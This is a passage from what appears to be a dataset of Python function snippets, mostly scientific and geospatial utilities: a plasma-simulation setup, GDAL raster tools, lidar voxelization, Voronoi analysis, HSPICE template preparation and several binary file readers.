FD_schemes\n )\n elif HOC[var] == 'FOURIER':\n # ensure the correct number of grid points\n # is passed for the generalized velocity Nvz_active\n # for x,y,z, 'vz' = vx, vy, vz\n # for vx, vy, vz, 'vz' = ax, ay, az, which have\n # the same number of dims as x, y, z, respectively\n\n if var[0] == 'v':\n Nvz_active = eval('N' + var[1] + '_active')\n else:\n Nvz_active = eval('Nv' + var + '_active')\n\n Xi, xi = assemble_spectral_derivative_operator(Xi, xi,\n var,\n eval('a' + var),\n eval('b' + var),\n eval('N' + var),\n eval('N' + var + '_active'),\n Nvz_active,\n N)\n\n # ---------------------------------------------------------------------\n # \"Alternating\" identity matrix\n\n\n # in lib.HOC.correctors, require an N x N diagonal matrix with entries\n # (-1)^i, where i is the row number, for details see on github\n #\n # dsirajud/IPython-notebooks/\n # DECSKS-09 -- array-based implementation recast -- part 1.ipynb\n #\n # section \"2D casting of correction coefficients c (vector) -> c (tensor)\"\n\n I_alternating = np.diag( (-np.ones(N)) ** np.arange(N) )\n\n # obtain Bernoulli numbers (note: list only 23 numbers are listed)\n # for a correction up to global error order N, N-1 Bernoulli numbers\n # are needed. 
If higher than global error order 22 is desired, additional\n # Bernoulli numbes need to be entered in\n #\n # etc/Table_of_Bernoulli_numbers.dat\n #\n\n # Store Bernoulli numbers from dat file etc/Table_of_Bernoulli_numbers.dat\n filename = 'Table_of_Bernoulli_numbers.dat'\n filepath = './etc/' + filename\n Bernoulli_numbers = Bernoulli(filepath)\n\n # \"A\" matrices for Bernoulli number storage and matrix HOC application\n # in lib.HOC.Beta_matrix, see notebook on github at\n # dsirajud/IPython-notebooks/\n # DECSKS-09 -- array-based implementation recast -- part 1.ipynb\n A_pos, A_neg = np.zeros([N,N]), np.zeros([N,N])\n for i in range(N):\n for j in range(i+1):\n A_pos[i,j] = Bernoulli_numbers[i-j] / scipy.misc.factorial(i-j)\n if (i - j) == 1:\n A_neg[i,j] = -A_pos[i,j]\n else:\n A_neg[i,j] = A_pos[i,j]\n\n A_matrix = {}\n # dictionary container\n # allow dictionary access to relevant matrix of Bernoulli numbers\n # by operating with str(int(np.sign(CFL.frac)))\n\n A_matrix['1'] = A_pos\n A_matrix['0'] = A_pos\n A_matrix['-1'] = A_neg\n\n\n # ---------------------------------------------------------------------\n # 6th order finite difference Poisson solver for periodic BCs\n # (stored as keys 'D' [difference matrix] and 'B' [inhomogeneity])\n\n Poisson_6th_order_PBC_FD_solver_matrices = assemble_Poisson_6th_order_PBC_FD_solver_matrices(Nx, BC)\n\n # TODO specialize right now to just be x, vx. Figure out how to generalize later with higher dimensions\n compute_electric_field_function_handle_prefix = \"DECSKS.lib.fieldsolvers.compute_electric_field_\"\n compute_electric_field_function_handle = \"\".join((compute_electric_field_function_handle_prefix, HOC['x'].lower()))\n\n derivative_method = {}\n derivative_method_prefix = 'DECSKS.lib.derivatives'\n for var in phasespace_vars:\n derivative_method[var] = \".\".join((derivative_method_prefix, HOC[var].lower()))\n\n sim_params = dict(\n N = N, HOC = HOC,\n derivative_method = derivative_method,\n Nx = Nx, ax = ax, bx = bx,\n Ny = Ny, ay = ay, by = by,\n Nz = Nz, az = az, bz = bz,\n Nvx = Nvx, avx = avx, bvx = bvx,\n Nvy = Nvy, avy = avy, bvy = bvy,\n Nvz = Nvz, avz = avz, bvz = bvz,\n Nt = Nt, T = T,\n phasespace_vars = phasespace_vars,\n numdims = numdims,\n active_dims = active_dims,\n total_dims = total_dims,\n density = density,\n split_scheme = split_scheme,\n splitting = splitting,\n plot_params = plot_params,\n record_outputs = record_outputs,\n outfiles = outfiles,\n BC = BC, # boundary conditions on all phase space variables\n I_alternating = I_alternating, # identity matrix with alternating signs according to row, used in computing correctors c\n A_matrix = A_matrix, # Matrices of Bernoulli numbers for HOC\n W = W,\n W_dn1_LTE6 = W_dn1_LTE6,\n Xi = Xi, # spectral differentiation operator matrix (1j*xi[i,j]) ** q\n xi = xi, # wave number vector\n Poisson_6th_order_PBC_FD_solver_matrices = Poisson_6th_order_PBC_FD_solver_matrices,\n compute_electric_field_function_handle = compute_electric_field_function_handle # determines if solver is FD or fourier based\n )\n\n infile.close()\n\n return sim_params", "def create_raster_datapackage(pk_type, path, file_flag, out_path):\n process_source(pk_type, path, file_flag, out_path)", "def readtempfilt(MAIN_OUTPUT_FILE='photz', OUTPUT_DIRECTORY='./OUTPUT'):\n\n root = os.path.join(OUTPUT_DIRECTORY, MAIN_OUTPUT_FILE)\n \n ###### .tempfilt\n file_path = root+'.tempfilt'\n \n if os.path.exists(file_path) is False:\n raise ValueError('File, %s, not found.' 
%(file_path))\n\n with open(file_path,'rb') as f:\n # summary data\n s = np.fromfile(file=f,dtype=np.int32, count=4)\n NFILT=s[0] # number of filters\n NTEMP=s[1] # number of templates\n NZ=s[2] # number points on the redshift grid\n NOBJ=s[3] # number of objects\n # (?) template SED convolved with filter transmission at each redshift\n tempfilt = np.fromfile(file=f,dtype=np.double,count=NFILT*NTEMP*NZ).reshape((NZ,NTEMP,NFILT)).transpose()\n # filter pivot wavelengths\n lc = np.fromfile(file=f,dtype=np.double,count=NFILT)\n # redshift grid\n zgrid = np.fromfile(file=f,dtype=np.double,count=NZ)\n # observed flux\n fnu = np.fromfile(file=f,dtype=np.double,count=NFILT*NOBJ).reshape((NOBJ,NFILT)).transpose()\n # (?) error in observed flux\n efnu = np.fromfile(file=f,dtype=np.double,count=NFILT*NOBJ).reshape((NOBJ,NFILT)).transpose()\n \n tempfilt = {'NFILT':NFILT,'NTEMP':NTEMP,'NZ':NZ,'NOBJ':NOBJ,\\\n 'tempfilt':tempfilt,'lc':lc,'zgrid':zgrid,'fnu':fnu,'efnu':efnu}\n\n return tempfilt", "def trimesh_to_vrml(mesh, output_file):\n\n with open(output_file, 'w') as f:\n f.write('#VRML V2.0 utf8\\n')\n f.write('Transform {\\n'\n ' children [\\n'\n ' Shape {\\n'\n ' geometry IndexedFaceSet {\\n'\n ' coord Coordinate {\\n'\n ' point[\\n')\n for v in mesh.vertices:\n f.write(' {:0.6f} {:0.6f} {:0.6f},\\n'.format(*v.tolist()))\n f.write(' ] # end of points\\n'\n ' } # end of Coordinate\\n'\n ' coordIndex [\\n')\n\n for face in mesh.faces:\n f.write(' {:d}, {:d}, {:d}, -1,\\n'.format(*face.tolist()))\n\n f.write(' ] # end of coordIndex\\n'\n ' } # end of geometry\\n'\n ' appearance Appearance {\\n'\n ' material Material {\\n'\n ' diffuseColor 0.7 0.7 0.7\\n'\n ' emissiveColor 0.05 0.05 0.05\\n'\n ' specularColor 1.0 1.0 1.0\\n'\n ' ambientIntensity 0.2\\n'\n ' shininess 0.2\\n'\n ' transparency 0.0\\n'\n ' } #end of material\\n'\n ' } #end of appearance\\n'\n ' } # end of Shape\\n'\n ' ] # end of children\\n'\n '}\\n')", "def cal_voro(inputfile, ndim, radii, ppp = '-p', results_path = '../../analysis/voro/'): \n if not os.path.exists(results_path):\n os.makedirs(results_path)\n\n basename = os.path.splitext(os.path.basename(inputfile))[0]\n fneighbor = open(results_path + basename + '.neighbor.dat', 'w')\n ffacearea = open(results_path + basename + '.facearea.dat', 'w')\n findex = open(results_path + basename + '.voroindex.dat', 'w') \n foverall = open(results_path + basename + '.overall.dat', 'w')\n\n position, bounds = get_input(inputfile, ndim, radii)\n for n in range(len(position)):\n fileformat = '%d ' + '%.6f ' * ndim + '%.2f'\n np.savetxt('dumpused', position[n], fmt = fileformat)\n \n #use box boundaries from snapshot\n Boxbounds = bounds[n].ravel()\n #use box boundaries from particle coordinates \n # boundsmin = position[n][:, 1: ndim + 1].min(axis = 0) - 0.1\n # boundsmax = position[n][:, 1: ndim + 1].max(axis = 0) + 0.1\n # Boxbounds = (np.column_stack((boundsmin, boundsmax))).ravel()\n\n cmdline = 'voro++ ' + ppp + ' -r -c \"%i %s %v %F @%i %A @%i %s %n @%i %s %f\" '\\\n + ('%f %f ' * ndim % tuple(Boxbounds)) + 'dumpused'\n if n == 0: print (cmdline)\n subprocess.run(cmdline, shell = True)\n\n fneighbor.write('id cn neighborlist\\n')\n ffacearea.write('id cn facearealist\\n')\n findex.write('id voro_index 0_to_7_faces\\n')\n foverall.write('id cn volume facearea\\n')\n f = open('dumpused.vol', 'r')\n for i in range(len(position[n][:, 0])):\n item = f.readline().split('@')\n foverall.write(item[0] + '\\n')\n findex.write(item[1] + '\\n')\n fneighbor.write(item[2] + '\\n')\n 
ffacearea.write(item[3])\n f.close()\n\n os.remove('dumpused') #delete temporary files\n os.remove('dumpused.vol')\n fneighbor.close()\n ffacearea.close()\n foverall.close()\n findex.close()\n print ('---------- Voronoi Analysis Done ------------')", "def reprojectAndSaveNewRaster(inFilepath,outFilepath,to_EPSG):\r\n from osgeo import gdal\r\n input_raster = gdal.Open(inFilepath)\r\n EPSG_string = \"EPSG:\"+str(to_EPSG)\r\n ras = gdal.Warp(outFilepath,input_raster,dstSRS=EPSG_string)\r\n del ras", "def voxelization(infile_path, outfile_path, voxel_size):\n\n infile = laspy.file.File(infile_path, mode=\"rw\")\n\n # 计算每个点的voxel码\n scaled_x = np.vectorize(int)((1 / voxel_size) * (infile.x - infile.header.min[0]))\n scaled_y = np.vectorize(int)((1 / voxel_size) * (infile.y - infile.header.min[1]))\n scaled_z = np.vectorize(int)((1 / voxel_size) * (infile.z - infile.header.min[2]))\n indices = np.lexsort((scaled_z, scaled_y, scaled_x))\n voxel_count = 0\n point_count = 0\n point_lengh = len(infile.x)\n\n # the array to store the code of the voxel, this is actually the row, columm and height number of the voxel\n code_array = []\n\n # the array to store the point number in each voxel\n points_in_one_voxel_array = []\n\n # the array to store the average intensity of points in a voxel\n intensity_in_one_voxel_array = []\n\n while point_count < point_lengh - 1:\n\n # the counter of points number in one voxel\n points_in_one_voxel_count = 1\n intensity_in_one_voxel_count = 0\n # loop of finding points with same code\n while point_count < point_lengh - 1 and \\\n scaled_x[indices[point_count + 1]] == scaled_x[indices[point_count]] and \\\n scaled_y[indices[point_count + 1]] == scaled_y[indices[point_count]] and \\\n scaled_z[indices[point_count + 1]] == scaled_z[indices[point_count]]:\n # add a voxel index label to the point\n infile.voxel_index[indices[point_count]] = voxel_count\n intensity_in_one_voxel_count += infile.intensity[indices[point_count]]\n point_count += 1\n points_in_one_voxel_count += 1\n\n infile.voxel_index[indices[point_count]] = voxel_count\n intensity_in_one_voxel_count += infile.intensity[indices[point_count]]\n intensity_in_one_voxel_array.append(intensity_in_one_voxel_count / points_in_one_voxel_count)\n points_in_one_voxel_array.append(points_in_one_voxel_count)\n # save the code to an array which later will be stored in the csv file\n code = \"{:0>4d}\".format(scaled_x[indices[point_count]]) + \\\n \"{:0>4d}\".format(scaled_y[indices[point_count]]) + \\\n \"{:0>4d}\".format(scaled_z[indices[point_count]])\n code_array.append(code)\n point_count += 1\n voxel_count += 1\n\n # save the code to the csv file sequentially\n code_array_length = len(code_array)\n with open(outfile_path, 'wb') as csvfile:\n writer = csv.writer(csvfile)\n count = 0\n while count < code_array_length:\n writer.writerow([code_array[count], points_in_one_voxel_array[count], intensity_in_one_voxel_array[count]])\n count += 1", "def _rasterize_vector_onto_base(\n base_raster_path, base_vector_path, attribute_id,\n target_raster_path, filter_string=None):\n base_raster = gdal.OpenEx(base_raster_path, gdal.OF_RASTER)\n raster_driver = gdal.GetDriverByName('GTiff')\n target_raster = raster_driver.CreateCopy(target_raster_path, base_raster)\n base_raster = None\n\n vector = gdal.OpenEx(base_vector_path)\n layer = vector.GetLayer()\n\n if filter_string is not None:\n layer.SetAttributeFilter(str(filter_string))\n gdal.RasterizeLayer(\n target_raster, [1], layer,\n options=['ATTRIBUTE=%s' % attribute_id])\n 
target_raster.FlushCache()\n target_raster = None\n layer = None\n vector = None", "def compilation(inputfile):\r\n\r\n # create empty dictionary to hold DataFrames\r\n f = {}\r\n\r\n # generate list of relevant files\r\n filelist = glob.glob(inputfile)\r\n\r\n # iterate through list of relevant files\r\n for infile in filelist:\r\n # run computations using lev files\r\n f[getfilename(infile)] = new_trans_imp(infile)\r\n # concatenate all of the DataFrames in dictionary f to one DataFrame: g\r\n g = pd.concat(f)\r\n # remove multiindex and replace with index=Datetime\r\n g = g.reset_index()\r\n g = g.set_index(['DateTime'])\r\n # drop old indexes\r\n g = g.drop(['level_0'], axis=1)\r\n # remove duplicates based on index then sort by index\r\n g['ind'] = g.index\r\n g.drop_duplicates(subset='ind', inplace=True)\r\n g.drop('ind', axis=1, inplace=True)\r\n g = g.sort_index()\r\n outfile = g\r\n return g", "def _read_dx(self, FN):\n if FN.endswith('.dx'):\n F = open(FN, 'r')\n else:\n import gzip\n F = gzip.open(FN, 'r')\n\n # Read the header\n line = F.readline()\n while line.find('object') == -1:\n line = F.readline()\n header = {}\n header['counts'] = [int(x) for x in line.split(' ')[-3:]]\n for name in ['origin', 'd0', 'd1', 'd2']:\n header[name] = [float(x) for x in F.readline().split(' ')[-3:]]\n F.readline()\n header['npts'] = int(F.readline().split(' ')[-3])\n\n # Test to make sure the grid type is okay.\n # These conditions are not absolultely essential,\n # but they reduce the number of subtraction operations.\n if not (header['d0'][1] == 0 and header['d0'][2] == 0\n and header['d1'][0] == 0 and header['d1'][2] == 0\n and header['d2'][0] == 0 and header['d2'][1] == 0):\n raise Exception('Trilinear grid must be in original basis')\n if not (header['d0'][0] > 0 and header['d1'][1] > 0\n and header['d2'][2] > 0):\n raise Exception('Trilinear grid must have positive coordinates')\n\n # Read the data\n vals = np.ndarray(shape=header['npts'], dtype=float)\n index = 0\n while index < header['npts']:\n line = F.readline()[:-1]\n items = [float(item) for item in line.split()]\n vals[index:index + len(items)] = items\n index = index + len(items)\n F.close()\n\n data = {\n 'origin':np.array(header['origin']), \\\n 'spacing':np.array([header['d0'][0],header['d1'][1],header['d2'][2]]), \\\n 'counts':np.array(header['counts']), \\\n 'vals':vals}\n return data", "def UpdateGT(out_file, data, src_file, epsg = 4326, drv = 'GTiff', datatype = gdal.GDT_Float32, NoData = -999):\n \n #assign which driver to use for the file format - default is .tif\n driver = gdal.GetDriverByName(drv)\n \n #source raster from which to use the geospatial metadata\n src_gt = gdal.Open(src_file)\n \n #data shape - detects whether to produce multiple bands or not\n if len(data.shape) == 2:\n [cols, rows] = data.shape\n n = 1\n else:\n [n, cols, rows] = data.shape\n\n #create the destination file\n dst_gt = driver.Create(out_file, rows, cols, n, datatype)\n \n #get the geotransform from the source file\n gt = src_gt.GetGeoTransform()\n \n #coordinate system in which to create the raster, in wkt form\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(epsg)\n dest_wkt = srs.ExportToWkt()\n \n #set the projection in the desired reference system\n dst_gt.SetGeoTransform(gt)\n dst_gt.SetProjection(dest_wkt)\n \n #set the data\n if n==1:\n dst_gt.GetRasterBand(1).WriteArray(data)\n dst_gt.GetRasterBand(1).SetNoDataValue(NoData)\n #close and write to file\n dst_gt.FlushCache()\n #used if there are multiple bands\n else:\n for i in 
range(n):\n dst_gt.GetRasterBand(i+1).WriteArray(data[i])\n dst_gt.GetRasterBand(i+1).SetNoDataValue(NoData)\n dst_gt.FlushCache()", "def preparehspiceidvgGEO4(wheretosimpath,templatepath,modelverilogpath,modelcardpath,vgs,vds,Lparam,Ach_UFCMparam,Cins_UFCMparam,W_UFCMparam,NBODYparam,NFINparam):\n#L=Lparam Ach_UFCM=Ach_UFCMparam Cins_UFCM=Cins_UFCMparam W_UFCM=W_UFCMparam NBODY=NBODYparam NFIN=NFINparam\n #make an aux copy of hspice file to simulate\n shutil.copyfile(templatepath,wheretosimpath+'idvgaux.sp')\n #make an aux copy of modelcard file to simulate\n shutil.copyfile(modelcardpath,wheretosimpath+'modelcardaux.nmos')\n\n #update path of model and modelcard\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'pathmodelverilog', modelverilogpath)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'pathmodelcard', '\\\"modelcardaux.nmos\\\"')\n\n #bias update\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsi', str(vgs[0]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsf', str(vgs[-1]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsdelta', str(vgs[1]-vgs[0]))\n\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsi', str(vds[0]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsf', str(vds[-1]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsdelta', str(vds[1]-vds[0]))\n\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'Lparam', Lparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'Ach_UFCMparam',Ach_UFCMparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'Cins_UFCMparam', Cins_UFCMparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'W_UFCMparam',W_UFCMparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'NBODYparam',NBODYparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'NFINparam', NFINparam)", "def preparehspiceidvgGEO1(wheretosimpath,templatepath,modelverilogpath,modelcardpath,vgs,vds,Lparam,HFINparam,TFIN_TOPparam,TFIN_BASEparam,EOTparam,NBODYparam,NFINparam):\n #make an aux copy of hspice file to simulate\n shutil.copyfile(templatepath,wheretosimpath+'idvgaux.sp')\n #make an aux copy of modelcard file to simulate\n shutil.copyfile(modelcardpath,wheretosimpath+'modelcardaux.nmos')\n\n #update path of model and modelcard\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'pathmodelverilog', modelverilogpath)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'pathmodelcard', '\\\"modelcardaux.nmos\\\"')\n\n #bias update\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsi', str(vgs[0]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsf', str(vgs[-1]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsdelta', str(vgs[1]-vgs[0]))\n\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsi', str(vds[0]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsf', str(vds[-1]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsdelta', str(vds[1]-vds[0]))\n\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'Lparam', Lparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'HFINparam',HFINparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'TFIN_TOPparam', TFIN_TOPparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'TFIN_BASEparam',TFIN_BASEparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'EOTparam', EOTparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'NBODYparam',NBODYparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'NFINparam', NFINparam)", "def 
preparehspiceidvgGEO1v2(wheretosimpath,templatepath,modelverilogpath,modelcardpath,vgs,vds,Lparam,HFINparam,TFIN_TOPparam,TFIN_BASEparam,EOTparam,NBODYparam,NFINparam,PHIGparam,RSHSparam,RSHDparam):\n #make an aux copy of hspice file to simulate\n shutil.copyfile(templatepath,wheretosimpath+'idvgaux.sp')\n #make an aux copy of modelcard file to simulate\n shutil.copyfile(modelcardpath,wheretosimpath+'modelcardaux.nmos')\n\n #update path of model and modelcard\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'pathmodelverilog', modelverilogpath)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'pathmodelcard', '\\\"modelcardaux.nmos\\\"')\n\n #bias update\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsi', str(vgs[0]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsf', str(vgs[-1]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vgsdelta', str(vgs[1]-vgs[0]))\n\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsi', str(vds[0]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsf', str(vds[-1]))\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'vdsdelta', str(vds[1]-vds[0]))\n\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'Lparam', Lparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'HFINparam',HFINparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'TFIN_TOPparam', TFIN_TOPparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'TFIN_BASEparam',TFIN_BASEparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'EOTparam', EOTparam)\n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'NBODYparam',NBODYparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'NFINparam', NFINparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'PHIGparam', PHIGparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'RSHSparam', RSHSparam) \n sf.inplace_change(wheretosimpath+'idvgaux.sp', 'RSHDparam', RSHDparam)", "def render_vtk(file_name):\n import vtk\n\n # Read the source file.\n reader = vtk.vtkUnstructuredGridReader()\n reader.SetFileName(file_name)\n reader.Update() # Needed because of GetScalarRange\n output = reader.GetOutput()\n scalar_range = output.GetScalarRange()\n\n # Create the mapper that corresponds the objects of the vtk.vtk file\n # into graphics elements\n mapper = vtk.vtkDataSetMapper()\n mapper.SetInputData(output)\n mapper.SetScalarRange(scalar_range)\n\n # Create the Actor\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n\n # Create the Renderer\n renderer = vtk.vtkRenderer()\n renderer.AddActor(actor)\n renderer.SetBackground(1, 1, 1) # Set background to white\n\n # Create the RendererWindow\n renderer_window = vtk.vtkRenderWindow()\n renderer_window.AddRenderer(renderer)\n\n # Create the RendererWindowInteractor and display the vtk_file\n interactor = vtk.vtkRenderWindowInteractor()\n interactor.SetRenderWindow(renderer_window)\n interactor.Initialize()\n interactor.Start()", "def fgm2iaga(path,\n fgm_fname,\n ftype='v',\n output_template='{stn}{date:%Y%m%d}{ftype}{interval}.{interval}'):\n df = parse(fgm_fname)\n delta = (df.index[1] - df.index[0]).total_seconds()\n if delta == 1.0:\n interval = 'sec'\n elif delta == 60.0:\n interval = 'min'\n else:\n raise ValueError('unknown data interval found in {}'.format(fgm_fname))\n stn = df.siteid[:3].upper()\n out_fname = os.path.join(path,\n output_template.format(stn=stn.lower(),\n date=df.date,\n ftype=ftype,\n interval=interval))\n with open(out_fname, 'w') as fid:\n fid.write(HEADER_TEMPLATE.format(stn=stn.upper(),\n lat=df.lat,\n lon=df.lon,\n el=0))\n for row in df.itertuples():\n dt = row.Index\n 
if row.flag:\n X = Y = Z = F = 99999\n else:\n X = row.x\n Y = row.y\n Z = row.z\n F = np.linalg.norm([X, Y, Z])\n fid.write('{date:%Y-%m-%d %H:%M:%S.000} {date:%j}'\n ' {X:>9.2f} {Y:>9.2f} {Z:>9.2f} {F:>9.2f}\\n'.format(date=dt,\n X=X,\n Y=Y,\n Z=Z,\n F=F))\n return out_fname", "def render(self, outputfile, cmd=GDALTRANSLATE, working_memory=1024,\n compress=None, tempdir=None):\n tmpfile = NamedTemporaryFile(\n suffix='.tif', prefix='gdalrender',\n dir=os.path.dirname(outputfile), delete=False\n )\n\n try:\n with self.get_tempfile(dir=tempdir) as inputfile:\n warp_cmd = [\n cmd,\n '-q', # Quiet - FIXME: Use logging\n '-of', 'GTiff', # Output to GeoTIFF\n '-co', 'BIGTIFF=IF_SAFER', # Use BigTIFF if >2GB\n '-co', 'NUM_THREADS=ALL_CPUS', # multithreaded compression for GeoTiff\n # gdal_translate does not support the following\n # '-multi', # Use multiple processes\n # '-overwrite', # Overwrite outputfile\n ]\n\n # Set the working memory so that gdalwarp doesn't stall of disk\n # I/O\n warp_cmd.extend([\n # gdal_translate does not support -wm\n # '-wm', working_memory,\n '--config', 'GDAL_CACHEMAX', working_memory\n ])\n\n # Use compression\n compress = str(compress).upper()\n if compress and compress != 'NONE':\n warp_cmd.extend(['-co', 'COMPRESS=%s' % compress])\n if compress in ('LZW', 'DEFLATE'):\n warp_cmd.extend(['-co', 'PREDICTOR=2'])\n\n # Run gdalwarp and output to tmpfile.name\n warp_cmd.extend([inputfile.name, tmpfile.name])\n check_output_gdal([str(e) for e in warp_cmd])\n\n # If it succeeds, then we move it to overwrite the actual\n # output\n os.rename(tmpfile.name, outputfile)\n return outputfile\n finally:\n rmfile(tmpfile.name, ignore_missing=True)\n rmfile(tmpfile.name + '.aux.xml', ignore_missing=True)", "def transform_from_file(self,\n file,\n format):\n\n # Prepare query URL\n _query_builder = Configuration.base_uri\n _query_builder += '/transform'\n _query_parameters = {\n 'format': format\n }\n _query_builder = APIHelper.append_url_with_query_parameters(_query_builder,\n _query_parameters, Configuration.array_serialization)\n _query_url = APIHelper.clean_url(_query_builder)\n\n # Prepare files\n _files = {\n 'file': file\n }\n\n # Prepare and execute request\n _request = self.http_client.post(_query_url, files=_files)\n CustomHeaderAuth.apply(_request)\n _context = self.execute_request(_request)\n self.validate_response(_context)\n\n # Return appropriate type\n return _context.response.raw_body", "def main(input_file_path, layer='all', out=None, grid_id_name='GRIDMET_ID',\n buffer=25, scale_factor=0.1, function='invdist', smooth=0, params=None,\n grid_res=None, z_stats=True, res_plot=True, overwrite=False, \n options=None, grid_meta_path=None):\n # build fishnet for interpolation\n make_grid(input_file_path, \n grid_id_name=grid_id_name,\n grid_meta_path=grid_meta_path, \n buffer=buffer, \n overwrite=overwrite,\n grid_res=grid_res)\n \n # run spatial interpolation depending on options\n interpolate(\n input_file_path, \n layer=layer, \n out=out,\n scale_factor=scale_factor, \n function=function, \n smooth=smooth,\n params=params,\n buffer=buffer,\n z_stats=z_stats,\n res_plot=res_plot,\n grid_id_name=grid_id_name,\n grid_res=grid_res,\n options=options,\n grid_meta_path=grid_meta_path)", "def create_video(input_file, output_file):\n input_video = VideoFileClip(input_file)\n output_video = input_video.fl_image(detect_lane.fit_and_plot)\n output_video.write_videofile(output_file, audio=False)", "def populate(infile):\n main(infile)", "def read_vmdas(self,):\n fd = 
self.f\n # The raw files produced by VMDAS contain a binary navigation data\n # block.\n self.cfg['sourceprog'] = 'VMDAS'\n ens = self.ensemble\n k = ens.k\n if self._source != 1 and self._debug_level >= 1:\n print(' \\n***** Apparently a VMDAS file \\n\\n')\n self._source = 1\n self.vars_read += ['time_gps',\n 'latitude_gps',\n 'longitude_gps',\n 'etime_gps',\n 'elatitude_gps',\n 'elongitude_gps',\n 'flags',\n 'ntime', ]\n utim = fd.read_ui8(4)\n date = tmlib.datetime(utim[2] + utim[3] * 256, utim[1], utim[0])\n # This byte is in hundredths of seconds (10s of milliseconds):\n time = tmlib.timedelta(milliseconds=(int(fd.read_ui32(1) / 10)))\n fd.seek(4, 1) # \"PC clock offset from UTC\" - clock drift in ms?\n ens.time_gps[k] = tmlib.date2epoch(date + time)[0]\n ens.latitude_gps[k] = fd.read_i32(1) * self._cfac\n ens.longitude_gps[k] = fd.read_i32(1) * self._cfac\n ens.etime_gps[k] = tmlib.date2epoch(date + tmlib.timedelta(\n milliseconds=int(fd.read_ui32(1) * 10)))[0]\n ens.elatitude_gps[k] = fd.read_i32(1) * self._cfac\n ens.elongitude_gps[k] = fd.read_i32(1) * self._cfac\n fd.seek(12, 1)\n ens.flags[k] = fd.read_ui16(1)\n fd.seek(6, 1)\n utim = fd.read_ui8(4)\n date = tmlib.datetime(utim[0] + utim[1] * 256, utim[3], utim[2])\n ens.ntime[k] = tmlib.date2epoch(date + tmlib.timedelta(\n milliseconds=int(fd.read_ui32(1) / 10)))[0]\n fd.seek(16, 1)\n self._nbyte = 2 + 76", "def init_from_file(self,file_name):\n with open(file_name, mode='rb') as file: # b is important -> binary\n file_content = file.read(1)\n x = file_content\n ct = int.from_bytes(x, byteorder='little', signed=False)\n file_content = file.read(ct)\n header = file_content.decode().split(\" \")\n vindex = header.index('-vectortype')\n vectortype = header[vindex + 1]\n\n if vectortype != 'REAL':\n print('Can\\'t initialize real vector store from ',vectortype,' vectors.')\n return\n\n #read in vectors and wrap in RealVectors\n incoming_terms, incoming_vectors = svu.readfile(file_name)\n self.init_from_lists(incoming_terms,incoming_vectors)", "def readDriverFile(self, input_file):\n\n\n fid = open(self.basePath + input_file,'r')\n\n # Line 1\n line = fid.readline()\n l_input = line.split('!')\n mshfile = l_input[0].rstrip()\n\n # Line 2\n line = fid.readline()\n l_input = line.split('!')\n obsfile = l_input[0].rstrip()\n\n # Line 3\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input=='null':\n topofile = []\n\n else:\n topofile = l_input[0].rstrip()\n\n\n # Line 4\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n mstart = float(l_input[1])\n\n else:\n mstart = l_input[0].rstrip()\n\n # Line 5\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n mref = float(l_input[1])\n\n else:\n mref = l_input[0].rstrip()\n\n # Line 6\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n staticInput = float(l_input[1])\n\n elif l_input[0]=='DEFAULT':\n staticInput = None\n\n else:\n staticInput = l_input[0].rstrip()\n\n\n # Line 7\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input=='DEFAULT':\n magfile = []\n\n else:\n magfile = l_input[0].rstrip()\n\n # Line 8\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input=='DEFAULT':\n wgtfile = []\n\n else:\n wgtfile = l_input[0].rstrip()\n\n # Line 9\n line = 